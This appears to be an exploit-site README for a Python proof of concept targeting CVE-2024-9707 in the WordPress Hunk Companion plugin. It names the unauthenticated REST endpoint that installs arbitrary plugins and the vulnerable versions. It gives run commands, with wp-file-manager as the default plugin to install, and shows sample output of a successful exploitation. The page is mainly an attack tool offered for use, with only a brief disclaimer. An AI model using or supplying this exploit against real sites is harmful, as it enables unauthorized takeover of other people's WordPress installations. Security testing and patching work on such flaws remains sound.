## https://sploitus.com/exploit?id=BE5594B0-0A05-5228-B656-ECCBA86C073E
# CVE-2024-9707-Poc ๐
# Description
This script exploits the vulnerability in the WordPress Hunk Companion plugin (CVE-2024-9707), allowing unauthorized attackers to install and activate arbitrary plugins via the /wp-json/hc/v1/themehunk-import REST API endpoint.
## Features
| **Feature** | **Description** |
|----------------------------|--------------------------------------------------------------|
| Plugin Version Detection | Automatically checks the plugin version. |
| Vulnerability Check | Determines if the detected version is vulnerable (<= 1.8.4). |
| Plugin Installation | Exploits the vulnerability to install and activate a specified plugin. |
## ๐ ๏ธ Installation and Usage:
### Prerequisites
- Python 3.x installed on your system.
- Required Python libraries: `requests`, `argparse`.
### Install the dependencies:
```bash
pip install requests
```
### Usage:
```
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
```
2- Run the script
```
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
```
### Example:
```
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
```
### Output
- **Version Detection**: Displays the detected version of the Hunk Companion plugin.
- **Vulnerability Status**: Informs whether the target is vulnerable.
- **Exploit Status**: Displays the result of the plugin installation attempt.
### Successful Output
```
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
```
### ๐ซ Disclaimer
This script is for educational purposes only. Use it responsibly and only on systems you own or have explicit permission to test. The authors are not responsible for any misuse or damage caused by this tool.
by: Khaled_alenazi | Nxploited